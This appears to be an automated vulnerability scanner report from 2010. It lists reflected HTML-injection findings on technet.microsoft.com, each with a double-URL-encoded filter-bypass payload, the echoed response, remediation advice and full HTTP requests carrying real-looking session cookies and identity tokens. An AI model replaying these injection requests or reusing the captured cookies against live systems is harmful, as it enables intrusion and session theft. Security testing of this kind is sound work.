X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:24:06 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us9fc60"><a>2c269684de0/library/bb727048" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48e96%2522%253e%253ca%253ebfb66181b8f was submitted in the REST URL parameter 2. This input was echoed as 48e96"><a>bfb66181b8f in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library48e96%2522%253e%253ca%253ebfb66181b8f/bb727048.aspx HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10200
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:25:05 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library48e96"><a>bfb66181b8f/bb727048" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48957%2522%253e%253ca%253ebdd8a0c7ee7 was submitted in the REST URL parameter 1. This input was echoed as 48957"><a>bdd8a0c7ee7 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us48957%2522%253e%253ca%253ebdd8a0c7ee7/library/bb727050.aspx HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10200
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:24:56 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us48957"><a>bdd8a0c7ee7/library/bb727050" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dccbb%2522%253e%253ca%253eb15911436e was submitted in the REST URL parameter 1. This input was echoed as dccbb"><a>b15911436e in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-usdccbb%2522%253e%253ca%253eb15911436e/library/bb727052.aspx HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10198
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:25:40 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usdccbb"><a>b15911436e/library/bb727052" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6fd40%2522%253e%253ca%253ea971c2a6b32 was submitted in the REST URL parameter 1. This input was echoed as 6fd40"><a>a971c2a6b32 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us6fd40%2522%253e%253ca%253ea971c2a6b32/library/bb727054.aspx HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10200
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:25:51 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us6fd40"><a>a971c2a6b32/library/bb727054" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3562%2522%253e%253ca%253eb70e9e2150d was submitted in the REST URL parameter 1. This input was echoed as c3562"><a>b70e9e2150d in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-usc3562%2522%253e%253ca%253eb70e9e2150d/library/bb727063.aspx HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10200
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:18:15 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usc3562"><a>b70e9e2150d/library/bb727063" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60505%2522%253e%253ca%253e8c06516092b was submitted in the REST URL parameter 2. This input was echoed as 60505"><a>8c06516092b in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library60505%2522%253e%253ca%253e8c06516092b/bb727063.aspx HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10200
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:18:44 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library60505"><a>8c06516092b/bb727063" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5c6e%2522%253e%253ca%253e5d24c93418e was submitted in the REST URL parameter 3. This input was echoed as f5c6e"><a>5d24c93418e in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/bb727063.aspxf5c6e%2522%253e%253ca%253e5d24c93418e HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
